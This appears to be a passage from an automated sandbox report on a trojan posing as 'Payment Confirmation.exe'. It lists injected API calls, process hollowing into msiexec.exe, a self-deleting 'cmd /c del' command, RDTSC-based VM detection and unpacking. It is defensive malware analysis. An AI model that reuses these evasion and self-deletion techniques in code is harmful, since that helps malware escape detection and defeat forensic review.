          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0046D24711_2_0046D247
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0046D35211_2_0046D352
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0046CB6E11_2_0046CB6E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0046CBE611_2_0046CBE6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00458C4B11_2_00458C4B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00458C9011_2_00458C90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0046CCB811_2_0046CCB8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00452D8911_2_00452D89
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00452D9011_2_00452D90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00452FB011_2_00452FB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 044EB150 appears 32 times
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_004185D0 NtCreateFile,4_2_004185D0
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_00418680 NtReadFile,4_2_00418680
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_00418700 NtClose,4_2_00418700
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_004187B0 NtAllocateVirtualMemory,4_2_004187B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529840 NtDelayExecution,LdrInitializeThunk,11_2_04529840
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529860 NtQuerySystemInformation,LdrInitializeThunk,11_2_04529860
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529540 NtReadFile,LdrInitializeThunk,11_2_04529540
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529910 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_04529910
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045295D0 NtClose,LdrInitializeThunk,11_2_045295D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045299A0 NtCreateSection,LdrInitializeThunk,11_2_045299A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529A50 NtCreateFile,LdrInitializeThunk,11_2_04529A50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045296D0 NtCreateKey,LdrInitializeThunk,11_2_045296D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045296E0 NtFreeVirtualMemory,LdrInitializeThunk,11_2_045296E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529710 NtQueryInformationToken,LdrInitializeThunk,11_2_04529710
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529FE0 NtCreateMutant,LdrInitializeThunk,11_2_04529FE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529780 NtMapViewOfSection,LdrInitializeThunk,11_2_04529780
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0452B040 NtSuspendThread,11_2_0452B040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529820 NtEnumerateKey,11_2_04529820
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045298F0 NtReadVirtualMemory,11_2_045298F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045298A0 NtWriteVirtualMemory,11_2_045298A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529950 NtQueueApcThread,11_2_04529950
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529560 NtWriteFile,11_2_04529560
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0452AD30 NtSetContextThread,11_2_0452AD30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529520 NtWaitForSingleObject,11_2_04529520
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045299D0 NtCreateProcessEx,11_2_045299D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045295F0 NtQueryInformationFile,11_2_045295F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529650 NtQueryValueKey,11_2_04529650
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529670 NtQueryInformationProcess,11_2_04529670
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529660 NtAllocateVirtualMemory,11_2_04529660
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529610 NtEnumerateValueKey,11_2_04529610
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529A10 NtQuerySection,11_2_04529A10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529A00 NtProtectVirtualMemory,11_2_04529A00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529A20 NtResumeThread,11_2_04529A20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529A80 NtOpenDirectoryObject,11_2_04529A80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529770 NtSetInformationFile,11_2_04529770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0452A770 NtOpenThread,11_2_0452A770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529760 NtOpenProcess,11_2_04529760
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0452A710 NtOpenProcessToken,11_2_0452A710
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529B00 NtSetValueKey,11_2_04529B00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529730 NtQueryVirtualMemory,11_2_04529730
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0452A3B0 NtGetContextThread,11_2_0452A3B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045297A0 NtUnmapViewOfSection,11_2_045297A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004685D0 NtCreateFile,11_2_004685D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00468680 NtReadFile,11_2_00468680
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00468700 NtClose,11_2_00468700
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004685CA NtCreateFile,11_2_004685CA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0046867A NtReadFile,11_2_0046867A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00468623 NtReadFile,11_2_00468623
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004686FA NtClose,11_2_004686FA
          Source: Payment Confirmation.exe, 00000001.00000003.361229670.000000000F196000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Payment Confirmation.exe
          Source: Payment Confirmation.exe, 00000004.00000002.438024069.0000000000C0F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Payment Confirmation.exe
          Source: Payment Confirmation.exe, 00000004.00000002.438309815.0000000000E6F000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs Payment Confirmation.exe
          Source: Payment Confirmation.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: Payment Confirmation.exeVirustotal: Detection: 24%
          Source: Payment Confirmation.exeReversingLabs: Detection: 20%
          Source: C:\Users\user\Desktop\Payment Confirmation.exeFile read: C:\Users\user\Desktop\Payment Confirmation.exeJump to behavior
          Source: Payment Confirmation.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Payment Confirmation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Payment Confirmation.exe 'C:\Users\user\Desktop\Payment Confirmation.exe'
          Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess created: C:\Users\user\Desktop\Payment Confirmation.exe 'C:\Users\user\Desktop\Payment Confirmation.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment Confirmation.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess created: C:\Users\user\Desktop\Payment Confirmation.exe 'C:\Users\user\Desktop\Payment Confirmation.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment Confirmation.exe'Jump to behavior
          Source: C:\Users\user\Desktop\Payment Confirmation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\Payment Confirmation.exeFile created: C:\Users\user\AppData\Local\Temp\nse1E08.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/2@11/8
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_00402053 CoCreateInstance,MultiByteToWideChar,1_2_00402053
          Source: C:\Users\user\Desktop\Payment Confirmation.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,1_2_00404292
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3800:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Binary string: msiexec.pdb source: Payment Confirmation.exe, 00000004.00000002.438290968.0000000000E60000.00000040.00020000.sdmp
          Source: Binary string: msiexec.pdbGCTL source: Payment Confirmation.exe, 00000004.00000002.438290968.0000000000E60000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Payment Confirmation.exe, 00000001.00000003.364311124.000000000F080000.00000004.00000001.sdmp, Payment Confirmation.exe, 00000004.00000002.437196803.0000000000960000.00000040.00000001.sdmp, msiexec.exe, 0000000B.00000002.628302033.00000000044C0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Payment Confirmation.exe, msiexec.exe

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\Payment Confirmation.exeUnpacked PE file: 4.2.Payment Confirmation.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_1000A525 push ecx; ret 1_2_1000A538
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_0041B87C push eax; ret 4_2_0041B882
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_0041B812 push eax; ret 4_2_0041B818
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_0041B81B push eax; ret 4_2_0041B882
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_0041CBE6 push dword ptr [2E339416h]; ret 4_2_0041CCB6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0453D0D1 push ecx; ret 11_2_0453D0E4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0046B87C push eax; ret 11_2_0046B882
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0046B812 push eax; ret 11_2_0046B818
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0046B81B push eax; ret 11_2_0046B882
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0046CBE6 push dword ptr [2E339416h]; ret 11_2_0046CCB6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0046B7C5 push eax; ret 11_2_0046B818
          Source: C:\Users\user\Desktop\Payment Confirmation.exeFile created: C:\Users\user\AppData\Local\Temp\nsp1E48.tmp\nawgsdqut.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: /c del 'C:\Users\user\Desktop\Payment Confirmation.exe'
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: /c del 'C:\Users\user\Desktop\Payment Confirmation.exe'Jump to behavior
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_10008856 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_10008856
          Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Payment Confirmation.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Payment Confirmation.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 1908Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 2880Thread sleep time: -34000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_004088E0 rdtsc 4_2_004088E0
          Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_00405E93 FindFirstFileA,FindClose,1_2_00405E93
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_004054BD
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_00402671 FindFirstFileA,1_2_00402671
          Source: explorer.exe, 00000005.00000000.379906764.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000005.00000000.418633743.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.414579080.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.379906764.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.414579080.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.379564727.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000005.00000000.379564727.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.418633743.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000005.00000000.370640534.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_10009418 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_10009418
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_10009418 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_10009418
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_100098E2 GetProcessHeap,1_2_100098E2
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_004088E0 rdtsc 4_2_004088E0
          Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_1001A402 mov eax, dword ptr fs:[00000030h]1_2_1001A402
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_1001A616 mov eax, dword ptr fs:[00000030h]1_2_1001A616
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_1001A6C7 mov eax, dword ptr fs:[00000030h]1_2_1001A6C7
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_1001A706 mov eax, dword ptr fs:[00000030h]1_2_1001A706
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_1001A744 mov eax, dword ptr fs:[00000030h]1_2_1001A744
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04500050 mov eax, dword ptr fs:[00000030h]11_2_04500050
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04500050 mov eax, dword ptr fs:[00000030h]11_2_04500050
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0457C450 mov eax, dword ptr fs:[00000030h]11_2_0457C450
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0457C450 mov eax, dword ptr fs:[00000030h]11_2_0457C450
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451A44B mov eax, dword ptr fs:[00000030h]11_2_0451A44B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A2073 mov eax, dword ptr fs:[00000030h]11_2_045A2073
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B1074 mov eax, dword ptr fs:[00000030h]11_2_045B1074
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0450746D mov eax, dword ptr fs:[00000030h]11_2_0450746D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04567016 mov eax, dword ptr fs:[00000030h]11_2_04567016
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04567016 mov eax, dword ptr fs:[00000030h]11_2_04567016
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04567016 mov eax, dword ptr fs:[00000030h]11_2_04567016
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B4015 mov eax, dword ptr fs:[00000030h]11_2_045B4015
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B4015 mov eax, dword ptr fs:[00000030h]11_2_045B4015
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B740D mov eax, dword ptr fs:[00000030h]11_2_045B740D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B740D mov eax, dword ptr fs:[00000030h]11_2_045B740D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B740D mov eax, dword ptr fs:[00000030h]11_2_045B740D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h]11_2_045A1C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h]11_2_045A1C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h]11_2_045A1C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h]11_2_045A1C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h]11_2_045A1C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h]11_2_045A1C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h]11_2_045A1C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h]11_2_045A1C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h]11_2_045A1C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h]11_2_045A1C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h]11_2_045A1C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h]11_2_045A1C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h]11_2_045A1C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h]11_2_045A1C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04566C0A mov eax, dword ptr fs:[00000030h]11_2_04566C0A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04566C0A mov eax, dword ptr fs:[00000030h]11_2_04566C0A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04566C0A mov eax, dword ptr fs:[00000030h]11_2_04566C0A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04566C0A mov eax, dword ptr fs:[00000030h]11_2_04566C0A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044FB02A mov eax, dword ptr fs:[00000030h]11_2_044FB02A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044FB02A mov eax, dword ptr fs:[00000030h]11_2_044FB02A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044FB02A mov eax, dword ptr fs:[00000030h]11_2_044FB02A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044FB02A mov eax, dword ptr fs:[00000030h]11_2_044FB02A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451002D mov eax, dword ptr fs:[00000030h]11_2_0451002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451002D mov eax, dword ptr fs:[00000030h]11_2_0451002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451002D mov eax, dword ptr fs:[00000030h]11_2_0451002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451002D mov eax, dword ptr fs:[00000030h]11_2_0451002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451002D mov eax, dword ptr fs:[00000030h]11_2_0451002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451BC2C mov eax, dword ptr fs:[00000030h]11_2_0451BC2C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0457B8D0 mov eax, dword ptr fs:[00000030h]11_2_0457B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0457B8D0 mov ecx, dword ptr fs:[00000030h]11_2_0457B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0457B8D0 mov eax, dword ptr fs:[00000030h]11_2_0457B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0457B8D0 mov eax, dword ptr fs:[00000030h]11_2_0457B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0457B8D0 mov eax, dword ptr fs:[00000030h]11_2_0457B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0457B8D0 mov eax, dword ptr fs:[00000030h]11_2_0457B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B8CD6 mov eax, dword ptr fs:[00000030h]11_2_045B8CD6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A14FB mov eax, dword ptr fs:[00000030h]11_2_045A14FB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04566CF0 mov eax, dword ptr fs:[00000030h]11_2_04566CF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04566CF0 mov eax, dword ptr fs:[00000030h]11_2_04566CF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04566CF0 mov eax, dword ptr fs:[00000030h]11_2_04566CF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E9080 mov eax, dword ptr fs:[00000030h]11_2_044E9080
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04563884 mov eax, dword ptr fs:[00000030h]11_2_04563884
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04563884 mov eax, dword ptr fs:[00000030h]11_2_04563884
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F849B mov eax, dword ptr fs:[00000030h]11_2_044F849B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451F0BF mov ecx, dword ptr fs:[00000030h]11_2_0451F0BF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451F0BF mov eax, dword ptr fs:[00000030h]11_2_0451F0BF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451F0BF mov eax, dword ptr fs:[00000030h]11_2_0451F0BF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045290AF mov eax, dword ptr fs:[00000030h]11_2_045290AF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04507D50 mov eax, dword ptr fs:[00000030h]11_2_04507D50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04523D43 mov eax, dword ptr fs:[00000030h]11_2_04523D43
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0450B944 mov eax, dword ptr fs:[00000030h]11_2_0450B944
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0450B944 mov eax, dword ptr fs:[00000030h]11_2_0450B944
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04563540 mov eax, dword ptr fs:[00000030h]11_2_04563540
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0450C577 mov eax, dword ptr fs:[00000030h]11_2_0450C577
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0450C577 mov eax, dword ptr fs:[00000030h]11_2_0450C577
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044EC962 mov eax, dword ptr fs:[00000030h]11_2_044EC962
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044EB171 mov eax, dword ptr fs:[00000030h]11_2_044EB171
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044EB171 mov eax, dword ptr fs:[00000030h]11_2_044EB171
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E9100 mov eax, dword ptr fs:[00000030h]11_2_044E9100
